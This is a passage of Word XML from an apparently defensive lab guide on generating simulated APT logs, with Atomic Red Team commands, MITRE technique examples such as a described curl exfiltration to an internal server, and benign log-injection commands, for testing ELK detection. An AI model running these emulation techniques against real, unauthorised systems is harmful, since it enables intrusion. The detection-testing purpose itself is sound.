        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Useful Links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440C70F5" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> Guide → </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/beats/filebeat/current/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C5639E0" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> Guide → </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/beats/winlogbeat/current/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="02F71C2C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Example </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> + Logstash + Kibana Integration → </w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-getting-started.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D0076A2" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Troubleshooting Beats → </w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/beats/filebeat/current/faq.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="652BE033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lastRenderedPageBreak/>
        <w:t>Step 4 — Generate &amp; Ingest APT Sample Data (detailed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F44F67E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4.0 Goals of this step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B1242D" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Produce realistic, testable APT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> logs (PowerShell execution, lateral movement, credential access, suspicious network activity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC5BB78" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Ingest those logs into ELK (via Beats or Logstash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B5E4CD" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Tag events with technique IDs (MITRE ATT&amp;CK) so you can map detections and evaluate rule performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E177034" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Keep everything safe and reversible (snapshots, isolated network).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24384BAA" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="3A394455">
          <v:rect id="_x0000_i1070" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBB8B42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4.1 Safety / prerequisites (must read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDA15EE" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Run tests only on lab VMs</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> created in Step 1. Use snapshots and revert if anything unexpected happens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188812B8" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Do not</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> run any destructive payloads or malware. Use Atomic Red Team (emulation tests) which are intentionally non-destructive and documented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3742ECB8" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Ensure attacker VM and target VMs are isolated from your company network and Internet (or limit Internet access).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D801A73" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Keep the runbook (from Step 1) handy to stop tests and revert snapshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56836BD1" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Links / reading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACC1A0E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Atomic Red Team: </w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/redcanaryco/atomic-red-team</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5310387E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Atomic Red Team docs (safe usage): </w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.atomicredteam.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30541676" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="41FF3D28">
          <v:rect id="_x0000_i1071" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EE7ACB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4.2 Option A — Use Atomic Red Team (recommended for mapped MITRE tests)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE993FC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Why use Atomic?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADF2D5E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Pre-defined “atomic tests” map to MITRE ATT&amp;CK techniques (e.g., PowerShell execution, credential dumping).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDC750B" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Tests are documented and mostly non-destructive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A83179D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Installation &amp; usage (PowerShell example — runs on Windows test VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222DBC1A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">On the </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows test VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t>, install dependencies (PowerShell 5+ comes with Windows 10/11).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F95F1A9" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Clone the repo or use Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>AtomicRedTeam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4664AD6C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Method 1 — Manual (clone)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5DD796" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t># On Windows (PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2456AD" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>git clone https://github.com/redcanaryco/atomic-red-team.git C:\atomic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031E2C1A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t># Explore tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378EA1A9" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:lastRenderedPageBreak/>
        <w:t>cd C:\atomic\atomics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DC9D6C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Each technique folder contains a README and command to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B901E97" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Method 2 — Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AtomicRedTeam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> helper module (easier)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F23F20" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t># Install PS module (requires internet access on the VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326C9846" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Install-Module -Name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>InvokeAtomicRedTeam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> -Scope </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>CurrentUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1A939E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538"/>
    <w:p w14:paraId="159DD43E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t># List available tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E3F8B5" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Import-Module </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>InvokeAtomicRedTeam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5EC91BB5" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>AtomicTest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> | Select-Object -First 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6438D46E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538"/>
    <w:p w14:paraId="733A6C74" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t># Run a test (example: T1059.001 PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235F9EF2" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>AtomicTest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> T1059.001 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>ShowDetails</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="266166AF" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Docs and module: </w:t>
      </w:r>
      <w:hyperlink r:id="rId46" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/redcanaryco/atomic-red-team/tree/master/atomic/red-team</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01AD06F8" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Important:</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> Inspect the commands before running. Use the -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>ShowDetails</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> option to view the commands. Prefer to run only detection-friendly techniques (e.g., PowerShell command invocation with no payload download).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F0FED4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Examples of Atomic tests to run (safe, non-destructive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696D07B2" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1059.001</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> — PowerShell: run a benign command that looks like a downloader (but doesn’t fetch): e.g. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> -c "Write-Output '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>TestPS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>'; Get-Process".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CD321A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1078</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> — Valid Accounts: simulate a login from another VM (RDP/SSH) with test credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5907BB47" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1021</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> — Remote Services: SSH into target from attacker VM (record logs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A8769A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1041</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> — Exfiltration Over C2 Channel: create a curl POST of a text file to an internal test HTTP server (not external internet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DAA354" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Atomic Red Team docs: https://atomicredteam.io/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB87588" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="77D9FDEC">
          <v:rect id="_x0000_i1072" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8195BC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4.3 Option B — Manual scripted events (quick &amp; safe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5A1109" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">If you prefer not to use Atomic or for Linux hosts, you can script benign-but-suspicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>behaviors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764C4189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Examples (Linux target VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667B189B" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Simulate privilege escalation attempt log entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> (write to auth log)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6BEB9F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t># on Linux test host (run as root to simulate logs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163AE92A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">logger -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>authpriv.notice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> "Possible privilege escalation attempt: user test attempted </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> -l"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0F9EC9" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Simulate suspicious PowerShell-like commands on Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> (use PowerShell to log to event logs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4B7D82" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:lastRenderedPageBreak/>
        <w:t># On Windows test VM - create an event for PowerShell usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1A9AB2" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>New-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>EventLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>LogName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> Application -Source "APT-SIM"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ADA0E4" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Write-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>EventLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>LogName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> Application -Source "APT-SIM" -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>EntryType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> Warning -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>EventId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> 5000 -Message "Simulated PowerShell download: Invoke-</w:t>
      </w:r>
